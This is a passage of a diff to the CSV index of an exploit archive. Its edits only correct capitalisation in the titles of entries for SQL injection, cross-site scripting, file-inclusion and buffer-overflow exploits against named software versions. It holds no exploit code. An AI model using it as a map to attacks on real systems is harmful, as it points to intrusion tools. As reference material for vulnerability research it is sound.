Cookie Remote Code Execution",2013-08-12,Metasploit,multiple,remote,0 27529,platforms/php/remote/27529.rb,"OpenX - Backdoor PHP Code Execution",2013-08-12,Metasploit,php,remote,0 27530,platforms/multiple/remote/27530.rb,"Squash - YAML Code Execution",2013-08-12,Metasploit,multiple,remote,0 -27531,platforms/php/webapps/27531.txt,"Wordpress Hms Testimonials Plugin 2.0.10 - Multiple Vulnerabilities",2013-08-12,RogueCoder,php,webapps,0 +27531,platforms/php/webapps/27531.txt,"WordPress Hms Testimonials Plugin 2.0.10 - Multiple Vulnerabilities",2013-08-12,RogueCoder,php,webapps,0 27532,platforms/php/webapps/27532.txt,"Joomla redSHOP Component 1.2 - SQL Injection",2013-08-12,"Matias Fontanini",php,webapps,0 27534,platforms/php/webapps/27534.txt,"MediaSlash Gallery - 'index.php' Remote File Inclusion",2006-03-30,"Morocco Security Team",php,webapps,0 27535,platforms/php/webapps/27535.txt,"O2PHP Oxygen 1.0/1.1 - post.php SQL Injection",2006-03-30,"Morocco Security Team",php,webapps,0 @@ -24639,7 +24640,7 @@ id,file,description,date,author,platform,type,port 27538,platforms/php/webapps/27538.txt,"RedCMS 0.1 - profile.php u Parameter SQL Injection",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 27539,platforms/php/webapps/27539.txt,"RedCMS 0.1 - 'login.php' Multiple Parameter SQL Injection",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 27540,platforms/php/webapps/27540.txt,"RedCMS 0.1 - register.php Multiple Field Cross-Site Scripting",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 -27727,platforms/windows/dos/27727.txt,"Microsoft Internet Explorer 6.0 - Nested OBJECT Tag Memory Corruption",2006-04-22,"Michal Zalewski",windows,dos,0 +27727,platforms/windows/dos/27727.txt,"Microsoft Internet Explorer 6 - Nested OBJECT Tag Memory Corruption",2006-04-22,"Michal Zalewski",windows,dos,0 27544,platforms/php/webapps/27544.txt,"SoftBiz Image Gallery - suggest_image.php cid Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 27545,platforms/php/webapps/27545.txt,"SoftBiz Image Gallery - insert_rating.php img_id Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 27546,platforms/php/webapps/27546.txt,"SoftBiz Image Gallery - images.php cid Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 @@ -24650,7 +24651,7 @@ id,file,description,date,author,platform,type,port 27551,platforms/php/webapps/27551.txt,"Blank'N'Berg 0.2 - Cross-Site Scripting",2006-03-31,"Amine ABOUD",php,webapps,0 27552,platforms/asp/webapps/27552.txt,"ISP Site Man - admin_login.asp SQL Injection",2006-04-01,s3rv3r_hack3r,asp,webapps,0 27553,platforms/windows/dos/27553.py,"onehttpd 0.7 - Denial of Service",2013-08-13,superkojiman,windows,dos,8080 -27554,platforms/windows/remote/27554.py,"MinaliC Webserver 2.0.0 - Buffer Overflow (Egghunter)",2013-08-13,PuN1sh3r,windows,remote,8080 +27554,platforms/windows/remote/27554.py,"MinaliC WebServer 2.0.0 - Buffer Overflow (Egghunter)",2013-08-13,PuN1sh3r,windows,remote,8080 27555,platforms/windows/remote/27555.rb,"HP StorageWorks P4000 Virtual SAN Appliance - Login Buffer Overflow",2013-08-13,Metasploit,windows,remote,13838 27556,platforms/windows/remote/27556.rb,"Open-FTPD 1.2 - Arbitrary File Upload",2013-08-13,Metasploit,windows,remote,8080 27558,platforms/jsp/webapps/27558.txt,"Bugzero 4.3.1 - query.jsp msg Parameter Cross-Site Scripting",2006-04-03,r0t,jsp,webapps,0 @@ -24672,7 +24673,7 @@ id,file,description,date,author,platform,type,port 27574,platforms/php/webapps/27574.txt,"Basic Analysis and Security Engine 1.2.4 - PrintFreshPage Cross-Site Scripting",2003-04-06,"Adam Ely",php,webapps,0 27575,platforms/php/webapps/27575.txt,"MD News 1 - admin.php SQL Injection",2006-04-06,"Aliaksandr Hartsuyeu",php,webapps,0 27576,platforms/php/webapps/27576.txt,"MAXDEV CMS 1.0.72/1.0.73 - PNuserapi.php SQL Injection",2006-04-06,king_purba,php,webapps,0 -27577,platforms/windows/remote/27577.txt,"Microsoft Internet Explorer 5.0 - Address Bar Spoofing",2006-04-03,"Hai Nam Luke",windows,remote,0 +27577,platforms/windows/remote/27577.txt,"Microsoft Internet Explorer 5 - Address Bar Spoofing",2006-04-03,"Hai Nam Luke",windows,remote,0 27578,platforms/php/webapps/27578.txt,"Jupiter CMS 1.1.5 - 'index.php' Cross-Site Scripting",2006-04-07,KaDaL-X,php,webapps,0 27579,platforms/php/webapps/27579.txt,"Bitweaver CMS 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-07,KaDaL-X,php,webapps,0 27580,platforms/php/webapps/27580.txt,"vBulletin 3.5.1 - Vbugs.php Cross-Site Scripting",2006-04-07,r0t,php,webapps,0 @@ -24689,7 +24690,7 @@ id,file,description,date,author,platform,type,port 27591,platforms/php/webapps/27591.txt,"Shadowed Portal 5.7 - Load.php Cross-Site Scripting",2006-04-10,Liz0ziM,php,webapps,0 27592,platforms/php/webapps/27592.txt,"SIRE 2.0 - Arbitrary File Upload",2006-04-10,simo64,php,webapps,0 27593,platforms/php/webapps/27593.txt,"VegaDNS 0.9.9 - 'index.php' cid Parameter SQL Injection",2006-04-10,Ph03n1X,php,webapps,0 -27594,platforms/cgi/webapps/27594.txt,"Matt Wright GuestBook 2.3.1 - Guestbook.pl Multiple HTML Injection Vulnerabilities",2006-04-07,Liz0ziM,cgi,webapps,0 +27594,platforms/cgi/webapps/27594.txt,"Matt Wright Guestbook 2.3.1 - Guestbook.pl Multiple HTML Injection Vulnerabilities",2006-04-07,Liz0ziM,cgi,webapps,0 27595,platforms/php/remote/27595.txt,"PHP 4.x - tempnam() Function open_basedir Restriction Bypass",2006-04-10,"Maksymilian Arciemowicz",php,remote,0 27596,platforms/php/remote/27596.txt,"PHP 4.x - copy() Function Safe Mode Bypass",2006-04-10,"Maksymilian Arciemowicz",php,remote,0 27597,platforms/php/webapps/27597.txt,"KCFinder 2.51 - Local File Disclosure",2013-08-15,DaOne,php,webapps,0 @@ -24712,7 +24713,7 @@ id,file,description,date,author,platform,type,port 27615,platforms/php/webapps/27615.txt,"AzDGVote - Remote File Inclusion",2006-04-11,SnIpEr_SA,php,webapps,0 27616,platforms/php/webapps/27616.txt,"JetPhoto 1.0/2.0/2.1 - thumbnail.php page Parameter Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0 27617,platforms/php/webapps/27617.txt,"JetPhoto 1.0/2.0/2.1 - gallery.php page Parameter Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0 -27618,platforms/php/webapps/27618.txt,"JetPhoto 1.0/2.0/2.1 - slideshow.php name Parameter Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0 +27618,platforms/php/webapps/27618.txt,"JetPhoto 1.0/2.0/2.1 - Slideshow.php name Parameter Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0 27619,platforms/php/webapps/27619.txt,"JetPhoto 1.0/2.0/2.1 - detail.php page Parameter Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0 27620,platforms/cgi/webapps/27620.txt,"Microsoft FrontPage - Server Extensions Cross-Site Scripting",2006-04-11,"Esteban Martinez Fayo",cgi,webapps,0 27621,platforms/php/webapps/27621.txt,"Clever Copy 3.0 - Connect.INC Information Disclosure",2006-04-11,"M.Hasran Addahroni",php,webapps,0 @@ -24723,10 +24724,10 @@ id,file,description,date,author,platform,type,port 27626,platforms/php/webapps/27626.txt,"Tritanium Bulletin Board 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-11,d4igoro,php,webapps,0 27627,platforms/windows/remote/27627.txt,"Saxopress - URL Parameter Directory Traversal",2006-04-11,SecuriTeam,windows,remote,0 27628,platforms/php/webapps/27628.txt,"SWSoft Confixx 3.0.6/3.0.8/3.1.2 - 'index.php' SQL Injection",2006-04-11,LoK-Crew,php,webapps,0 -27629,platforms/php/webapps/27629.txt,"Chipmunk GuestBook 1.3 - 'index.php' SQL Injection",2006-04-12,Dr.Jr7,php,webapps,0 +27629,platforms/php/webapps/27629.txt,"Chipmunk Guestbook 1.3 - 'index.php' SQL Injection",2006-04-12,Dr.Jr7,php,webapps,0 27630,platforms/linux/remote/27630.txt,"Plone 2.x - MembershipTool Access Control Bypass",2006-04-12,MJ0011,linux,remote,0 27631,platforms/cgi/webapps/27631.txt,"Interaktiv.shop 4/5 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-12,r0t,cgi,webapps,0 -27632,platforms/php/webapps/27632.txt,"PHPMyAdmin 2.7 - sql.php Cross-Site Scripting",2005-10-31,p0w3r,php,webapps,0 +27632,platforms/php/webapps/27632.txt,"phpMyAdmin 2.7 - sql.php Cross-Site Scripting",2005-10-31,p0w3r,php,webapps,0 27635,platforms/linux/dos/27635.txt,"Mozilla Firefox 1.0.x/1.5 - HTML Parsing Null Pointer Dereference Denial of Service",2006-04-13,"Thomas Waldegger",linux,dos,0 27636,platforms/multiple/remote/27636.txt,"Adobe Document Server 6.0 Extensions - ads-readerext actionID Parameter Cross-Site Scripting",2006-04-13,"Tan Chew Keong",multiple,remote,0 27637,platforms/multiple/remote/27637.txt,"Adobe Document Server 6.0 Extensions - AlterCast op Parameter Cross-Site Scripting",2006-04-13,"Tan Chew Keong",multiple,remote,0 @@ -24742,7 +24743,7 @@ id,file,description,date,author,platform,type,port 27647,platforms/php/webapps/27647.txt,"Papoo 2.1.x - print.php Cross-Site Scripting",2006-04-14,"Rusydi Hasan",php,webapps,0 27648,platforms/php/webapps/27648.txt,"MODxCMS 0.9.1 - 'index.php' Cross-Site Scripting",2006-04-14,"Rusydi Hasan",php,webapps,0 27649,platforms/php/webapps/27649.txt,"MODxCMS 0.9.1 - 'index.php' Directory Traversal",2006-04-14,"Rusydi Hasan",php,webapps,0 -27650,platforms/php/webapps/27650.txt,"FarsiNews 2.1/2.5 - search.php Cross-Site Scripting",2006-04-14,"amin emami",php,webapps,0 +27650,platforms/php/webapps/27650.txt,"Farsinews 2.1/2.5 - search.php Cross-Site Scripting",2006-04-14,"amin emami",php,webapps,0 27651,platforms/php/webapps/27651.txt,"Tiny Web Gallery 1.4 - 'index.php' Cross-Site Scripting",2006-04-15,Qex,php,webapps,0 27652,platforms/php/webapps/27652.txt,"Quack Chat 1.0 - Multiple Vulnerabilities",2013-08-17,"Dylan Irzi",php,webapps,80 27969,platforms/multiple/dos/27969.c,"Quake 3 Engine - CL_ParseDownload Remote Buffer Overflow",2006-06-05,"Luigi Auriemma",multiple,dos,0 @@ -24756,7 +24757,7 @@ id,file,description,date,author,platform,type,port 27661,platforms/php/webapps/27661.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (1)",2006-04-17,Hessam-x,php,webapps,0 27662,platforms/php/webapps/27662.txt,"Blursoft Blur6ex 0.3.462 - 'index.php' Local File Inclusion",2006-04-17,"Hamid Ebadi",php,webapps,0 27663,platforms/php/webapps/27663.txt,"DbbS 2.0 - Multiple Input Validation Vulnerabilities",2006-04-17,rgod,php,webapps,0 -27664,platforms/php/webapps/27664.txt,"Jax GuestBook 3.50 - Page Parameter Cross-Site Scripting",2006-04-17,ALMOKANN3,php,webapps,0 +27664,platforms/php/webapps/27664.txt,"Jax Guestbook 3.50 - Page Parameter Cross-Site Scripting",2006-04-17,ALMOKANN3,php,webapps,0 27665,platforms/php/webapps/27665.txt,"Calendarix 0.7 - YearCal.php Cross-Site Scripting",2006-04-17,botan,php,webapps,0 27666,platforms/php/webapps/27666.txt,"Manila 9.0.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-17,"Aaron Kaplan",php,webapps,0 27667,platforms/php/webapps/27667.txt,"MyBB 1.1 - Global Variable Overwrite",2006-04-17,imei,php,webapps,0 @@ -24779,7 +24780,7 @@ id,file,description,date,author,platform,type,port 27684,platforms/jsp/webapps/27684.txt,"Cisco Wireless Lan Solution Engine - ArchiveApplyDisplay.jsp Cross-Site Scripting",2006-04-19,"Adam Pointon",jsp,webapps,0 27685,platforms/cgi/webapps/27685.txt,"IntelliLink Pro 5.06 - addlink_lwp.cgi url Parameter Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 27686,platforms/cgi/webapps/27686.txt,"IntelliLink Pro 5.06 - edit.cgi Multiple Parameter Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 -27687,platforms/php/webapps/27687.txt,"ThWboard 2.8 - Showtopic.php SQL Injection",2006-04-19,Qex,php,webapps,0 +27687,platforms/php/webapps/27687.txt,"ThWboard 2.8 - showtopic.php SQL Injection",2006-04-19,Qex,php,webapps,0 27688,platforms/php/webapps/27688.txt,"ContentBoxx - 'login.php' Cross-Site Scripting",2006-04-19,botan,php,webapps,0 27689,platforms/cgi/webapps/27689.txt,"BannerFarm 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps,0 27690,platforms/cgi/webapps/27690.txt,"xFlow 5.46.11 - index.cgi Multiple Parameter SQL Injection",2006-04-19,r0t,cgi,webapps,0 @@ -24789,16 +24790,16 @@ id,file,description,date,author,platform,type,port 27694,platforms/cgi/webapps/27694.txt,"AWStats 4.0/5.x/6.x - AWStats.pl Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps,0 27695,platforms/cgi/webapps/27695.txt,"Net Clubs Pro 4.0 - sendim.cgi Multiple Parameter Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 27696,platforms/cgi/webapps/27696.txt,"Net Clubs Pro 4.0 - imessage.cgi username Parameter Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 -27697,platforms/cgi/webapps/27697.txt,"Net Clubs Pro 4.0 - login.cgi password Parameter Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 +27697,platforms/cgi/webapps/27697.txt,"Net Clubs Pro 4.0 - login.cgi Password Parameter Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 28055,platforms/hardware/webapps/28055.txt,"TP-Link TD-W8951ND - Multiple Vulnerabilities",2013-09-03,xistence,hardware,webapps,0 -28056,platforms/hardware/remote/28056.txt,"Mikrotik RouterOS sshd (ROSSSH) - Remote Pre-Authenticated Heap Corruption",2013-09-03,kingcope,hardware,remote,0 +28056,platforms/hardware/remote/28056.txt,"Mikrotik RouterOS sshd (ROSSSH) - Remote Pre-Authentication Heap Corruption",2013-09-03,kingcope,hardware,remote,0 28057,platforms/php/webapps/28057.txt,"Cline Communications - Multiple SQL Injections",2006-06-17,Liz0ziM,php,webapps,0 28058,platforms/php/webapps/28058.txt,"Eduha Meeting - 'index.php' Arbitrary File Upload",2006-06-19,Liz0ziM,php,webapps,0 28061,platforms/asp/webapps/28061.txt,"Cisco CallManager 3.x/4.x - Web Interface ccmadmin/phonelist.asp pattern Parameter Cross-Site Scripting",2006-06-19,"Jake Reynolds",asp,webapps,0 28062,platforms/asp/webapps/28062.txt,"Cisco CallManager 3.x/4.x - Web Interface ccmuser/logon.asp Cross-Site Scripting",2006-06-19,"Jake Reynolds",asp,webapps,0 28700,platforms/php/webapps/28700.txt,"CubeCart 3.0.x - view_order.php order_id Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 28053,platforms/hardware/webapps/28053.txt,"Zoom Telephonics ADSL Modem/Router - Multiple Vulnerabilities",2013-09-03,"Kyle Lovett",hardware,webapps,0 -28054,platforms/php/webapps/28054.txt,"Wordpress IndiaNIC Testimonial Plugin - Multiple Vulnerabilities",2013-09-03,RogueCoder,php,webapps,0 +28054,platforms/php/webapps/28054.txt,"WordPress IndiaNIC Testimonial Plugin - Multiple Vulnerabilities",2013-09-03,RogueCoder,php,webapps,0 27700,platforms/windows/dos/27700.py,"VLC Player 2.0.8 - '.m3u' Local Crash (PoC)",2013-08-19,Asesino04,windows,dos,0 27707,platforms/php/webapps/27707.txt,"I-RATER Platinum - Common.php Remote File Inclusion",2006-04-20,r0t,php,webapps,0 27708,platforms/php/webapps/27708.txt,"EasyGallery 1.17 - EasyGallery.php Cross-Site Scripting",2006-04-20,botan,php,webapps,0 @@ -24816,23 +24817,23 @@ id,file,description,date,author,platform,type,port 27711,platforms/php/webapps/27711.txt,"ThWboard 3.0 - 'index.php' Cross-Site Scripting",2006-04-20,"CrAzY CrAcKeR",php,webapps,0 27712,platforms/cgi/webapps/27712.txt,"Portal Pack 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-20,r0t,cgi,webapps,0 27713,platforms/php/webapps/27713.txt,"Manic Web MWGuest 2.1 - MWguest.php HTML Injection",2006-04-20,"Aliaksandr Hartsuyeu",php,webapps,0 -27714,platforms/osx/dos/27714.txt,"Apple Mac OSX 10.x - LZWDecodeVector (.tiff) Overflow",2006-04-20,"Tom Ferris",osx,dos,0 -27715,platforms/osx/dos/27715.txt,"Apple Mac OSX 10.x - '.zip' Parsing BOMStackPop() Function Overflow",2006-04-20,"Tom Ferris",osx,dos,0 +27714,platforms/osx/dos/27714.txt,"Apple Mac OS X 10.x - LZWDecodeVector (.tiff) Overflow",2006-04-20,"Tom Ferris",osx,dos,0 +27715,platforms/osx/dos/27715.txt,"Apple Mac OS X 10.x - '.zip' Parsing BOMStackPop() Function Overflow",2006-04-20,"Tom Ferris",osx,dos,0 27716,platforms/multiple/remote/27716.txt,"Asterisk Recording Interface 0.7.15 - Audio.php Information Disclosure",2006-04-21,"Francois Harvey",multiple,remote,0 -27717,platforms/php/webapps/27717.txt,"PHPldapadmin 0.9.8 - compare_form.php dn Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 -27718,platforms/php/webapps/27718.txt,"PHPldapadmin 0.9.8 - copy_form.php dn Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 -27719,platforms/php/webapps/27719.txt,"PHPldapadmin 0.9.8 - rename_form.php dn Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 +27717,platforms/php/webapps/27717.txt,"phpLDAPadmin 0.9.8 - compare_form.php dn Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 +27718,platforms/php/webapps/27718.txt,"phpLDAPadmin 0.9.8 - copy_form.php dn Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 +27719,platforms/php/webapps/27719.txt,"phpLDAPadmin 0.9.8 - rename_form.php dn Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 33404,platforms/php/webapps/33404.txt,"PHPFaber CMS 1.3.36 - 'module.php' Cross-Site Scripting",2009-12-14,bi0,php,webapps,0 -27721,platforms/php/webapps/27721.txt,"PHPldapadmin 0.9.8 - search.php scope Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 -27722,platforms/php/webapps/27722.txt,"PHPldapadmin 0.9.8 - template_engine.php Multiple Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 +27721,platforms/php/webapps/27721.txt,"phpLDAPadmin 0.9.8 - search.php scope Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 +27722,platforms/php/webapps/27722.txt,"phpLDAPadmin 0.9.8 - template_engine.php Multiple Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 27723,platforms/linux/dos/27723.txt,"Yukihiro Matsumoto Ruby 1.x - XMLRPC Server Denial of Service",2006-04-21,"Tanaka Akira",linux,dos,0 27724,platforms/php/webapps/27724.txt,"Scry Gallery - Directory Traversal",2006-04-21,"Morocco Security Team",php,webapps,0 27725,platforms/php/webapps/27725.txt,"MKPortal 1.1 - Multiple Input Validation Vulnerabilities",2006-04-22,"Mustafa Can Bjorn IPEKCI",php,webapps,0 27726,platforms/php/webapps/27726.txt,"Simplog 0.9.3 - ImageList.php Cross-Site Scripting",2006-04-22,nukedx,php,webapps,0 27730,platforms/multiple/dos/27730.py,"Lotus Domino 7.0.x/8.0/8.5 - LDAP Message Remote Denial of Service",2006-04-24,"Evgeny Legerov",multiple,dos,0 -27731,platforms/php/webapps/27731.txt,"photokorn 1.53/1.54 - 'index.php' Multiple Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 -27732,platforms/php/webapps/27732.txt,"photokorn 1.53/1.54 - postcard.php id Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 -27733,platforms/php/webapps/27733.txt,"photokorn 1.53/1.54 - print.php cat Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 +27731,platforms/php/webapps/27731.txt,"PhotoKorn 1.53/1.54 - 'index.php' Multiple Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 +27732,platforms/php/webapps/27732.txt,"PhotoKorn 1.53/1.54 - postcard.php id Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 +27733,platforms/php/webapps/27733.txt,"PhotoKorn 1.53/1.54 - print.php cat Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 27734,platforms/php/webapps/27734.txt,"NextAge Shopping Cart - Multiple HTML Injection Vulnerabilities",2006-04-25,R@1D3N,php,webapps,0 27735,platforms/php/webapps/27735.txt,"PHPWebFTP 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-25,arko.dhar,php,webapps,0 27736,platforms/php/webapps/27736.txt,"Invision Power Board 2.0/2.1 - 'index.php' CK Parameter SQL Injection",2006-05-25,IceShaman,php,webapps,0 @@ -24840,16 +24841,16 @@ id,file,description,date,author,platform,type,port 27738,platforms/php/webapps/27738.txt,"Instant Photo Gallery 1.0 - portfolio.php cat_id Parameter Cross-Site Scripting",2006-04-25,Qex,php,webapps,0 27739,platforms/php/webapps/27739.txt,"Instant Photo Gallery 1.0 - portfolio_photo_popup.php id Parameter Cross-Site Scripting",2006-04-25,Qex,php,webapps,0 27740,platforms/php/webapps/27740.txt,"CuteNews 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-26,outlaw.dll,php,webapps,0 -27741,platforms/php/webapps/27741.txt,"FarsiNews 2.5.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-26,O.U.T.L.A.W.,php,webapps,0 +27741,platforms/php/webapps/27741.txt,"Farsinews 2.5.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-26,O.U.T.L.A.W.,php,webapps,0 27742,platforms/php/webapps/27742.txt,"DevBB 1.0 - member.php Cross-Site Scripting",2006-04-26,Qex,php,webapps,0 27743,platforms/php/webapps/27743.txt,"MySmartBB 1.1.2/1.1.3 - Multiple Input Validation Vulnerabilities",2006-04-04,BoNy-m,php,webapps,0 -27744,platforms/windows/remote/27744.html,"Microsoft Internet Explorer 5.0.1 - Modal Dialog Manipulation",2006-04-26,"Matthew Murphy",windows,remote,0 +27744,platforms/windows/remote/27744.html,"Microsoft Internet Explorer 5.0.1 - Modal Dialog manipulation",2006-04-26,"Matthew Murphy",windows,remote,0 27745,platforms/windows/dos/27745.txt,"Outlook Express 5.5/6.0 / Windows Mail - MHTML URI Handler Information Disclosure",2006-04-27,codedreamer,windows,dos,0 27746,platforms/windows/remote/27746.txt,"winiso 5.3 - Directory Traversal",2006-04-28,Sowhat,windows,remote,0 27747,platforms/windows/remote/27747.pl,"freeFTPd 1.0.10 (PASS Command) - SEH Buffer Overflow",2013-08-21,Wireghoul,windows,remote,21 27749,platforms/hardware/dos/27749.rb,"Schneider Electric PLC ETY Series Ethernet Controller - Denial of Service",2013-08-21,"Arash Abedian",hardware,dos,0 27750,platforms/php/webapps/27750.py,"Bitbot C2 Panel - gate2.php Multiple Vulnerabilities",2013-08-21,bwall,php,webapps,0 -27751,platforms/php/webapps/27751.txt,"Wordpress ThinkIT Plugin 0.1 - Multiple Vulnerabilities",2013-08-21,"Yashar shahinzadeh",php,webapps,0 +27751,platforms/php/webapps/27751.txt,"WordPress ThinkIT Plugin 0.1 - Multiple Vulnerabilities",2013-08-21,"Yashar shahinzadeh",php,webapps,0 27752,platforms/unix/remote/27752.rb,"Graphite Web - Unsafe Pickle Handling",2013-08-21,Metasploit,unix,remote,0 27753,platforms/hardware/webapps/27753.txt,"Samsung DVR Firmware 1.10 - Authentication Bypass",2013-08-21,"Andrea Fabrizi",hardware,webapps,80 27754,platforms/windows/remote/27754.txt,"Oracle Java - BytePackedRaster.verify() Signed Integer Overflow",2013-08-21,"Packet Storm",windows,remote,0 @@ -24859,11 +24860,11 @@ id,file,description,date,author,platform,type,port 27758,platforms/windows/remote/27758.txt,"ezb systems ultraiso 8.0.1392 - Directory Traversal",2006-04-28,Sowhat,windows,remote,0 27759,platforms/windows/remote/27759.txt,"magiciso 5.0 build 0166 - Directory Traversal",2006-04-28,Sowhat,windows,remote,0 27760,platforms/windows/remote/27760.txt,"poweriso 2.9 - Directory Traversal",2006-04-28,Sowhat,windows,remote,0 -27761,platforms/cgi/webapps/27761.txt,"NeoMail - NeoMail.pl SessionID Parameter Cross-Site Scripting",2006-04-28,O.U.T.L.A.W,cgi,webapps,0 +27761,platforms/cgi/webapps/27761.txt,"NeoMail - NeoMail.pl sessionid Parameter Cross-Site Scripting",2006-04-28,O.U.T.L.A.W,cgi,webapps,0 27762,platforms/linux/dos/27762.txt,"LibTiff 3.x - Multiple Denial of Service Vulnerabilities",2006-04-28,"Tavis Ormandy",linux,dos,0 27763,platforms/php/webapps/27763.php,"I-RATER Platinum - Config_settings.TPL.php Remote File Inclusion",2006-04-28,O.U.T.L.A.W,php,webapps,0 27764,platforms/linux/dos/27764.txt,"LibTiff 3.x - TIFFFetchData Integer Overflow",2006-04-28,"Tavis Ormandy",linux,dos,0 -27765,platforms/linux/dos/27765.txt,"LibTiff 3.x - Double Free Memory Corruption",2008-04-28,"Tavis Ormandy",linux,dos,0 +27765,platforms/linux/dos/27765.txt,"LibTiff 3.x - Double-Free Memory Corruption",2008-04-28,"Tavis Ormandy",linux,dos,0 27766,platforms/linux/local/27766.txt,"Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0 27767,platforms/php/webapps/27767.txt,"Artmedic Event - 'index.php' Remote File Inclusion",2006-04-28,botan,php,webapps,0 27768,platforms/php/webapps/27768.php,"CoolMenus 4.0 - 'index.php' Remote File Inclusion",2006-04-28,botan,php,webapps,0 @@ -24879,7 +24880,7 @@ id,file,description,date,author,platform,type,port 27776,platforms/linux/webapps/27776.rb,"Foreman (Red Hat OpenStack/Satellite) - users/create Mass Assignment",2013-08-22,Metasploit,linux,webapps,443 27777,platforms/windows/webapps/27777.txt,"DeWeS 0.4.2 - Directory Traversal",2013-08-22,"High-Tech Bridge SA",windows,webapps,0 27778,platforms/linux/dos/27778.txt,"Samba nttrans Reply - Integer Overflow",2013-08-22,x90c,linux,dos,139 -27779,platforms/php/webapps/27779.txt,"Advanced GuestBook 2.x - Addentry.php Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 +27779,platforms/php/webapps/27779.txt,"Advanced Guestbook 2.x - Addentry.php Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 27780,platforms/php/webapps/27780.txt,"4Images 1.7.1 - top.php sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0 27781,platforms/php/webapps/27781.txt,"4Images 1.7.1 - member.php sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0 27782,platforms/php/webapps/27782.txt,"TextFileBB 1.0.16 - Multiple Tag Script Injection Vulnerabilities",2006-04-29,r0xes,php,webapps,0 @@ -24890,7 +24891,7 @@ id,file,description,date,author,platform,type,port 27787,platforms/php/webapps/27787.txt,"MaxTrade 1.0.1 - Multiple SQL Injections",2006-05-01,r0t,php,webapps,0 27788,platforms/php/webapps/27788.txt,"OrbitHYIP 2.0 - signup.php referral Parameter Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 27789,platforms/php/webapps/27789.txt,"OrbitHYIP 2.0 - members.php id Parameter Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 -27790,platforms/osx/dos/27790.txt,"Apple Mac OSX 10.x - ImageIO OpenEXR Image File Remote Denial of Service",2006-05-01,Christian,osx,dos,0 +27790,platforms/osx/dos/27790.txt,"Apple Mac OS X 10.x - ImageIO OpenEXR Image File Remote Denial of Service",2006-05-01,Christian,osx,dos,0 27791,platforms/linux/dos/27791.txt,"Xine 0.99.x - Filename Handling Remote Format String",2006-05-01,KaDaL-X,linux,dos,0 27792,platforms/php/webapps/27792.txt,"SunShop Shopping Cart 3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-01,r0t,php,webapps,0 27793,platforms/php/webapps/27793.txt,"Collaborative Portal Server 3.4 - POS Parameter Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 @@ -24912,9 +24913,9 @@ id,file,description,date,author,platform,type,port 27810,platforms/php/webapps/27810.txt,"Albinator 2.0.8 - dlisting.php cid Parameter Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 27811,platforms/php/webapps/27811.txt,"Albinator 2.0.8 - showpic.php preloadSlideShow Parameter Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 27812,platforms/php/webapps/27812.txt,"PHP Linkliste 1.0 - Linkliste.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,d4igoro,php,webapps,0 -27813,platforms/asp/webapps/27813.txt,"CyberBuild - 'login.asp' SessionID Parameter SQL Injection",2006-05-03,r0t,asp,webapps,0 +27813,platforms/asp/webapps/27813.txt,"CyberBuild - 'login.asp' sessionid Parameter SQL Injection",2006-05-03,r0t,asp,webapps,0 27814,platforms/asp/webapps/27814.txt,"CyberBuild - browse0.htm ProductIndex Parameter SQL Injection",2006-05-03,r0t,asp,webapps,0 -27815,platforms/asp/webapps/27815.txt,"CyberBuild - 'login.asp' SessionID Parameter 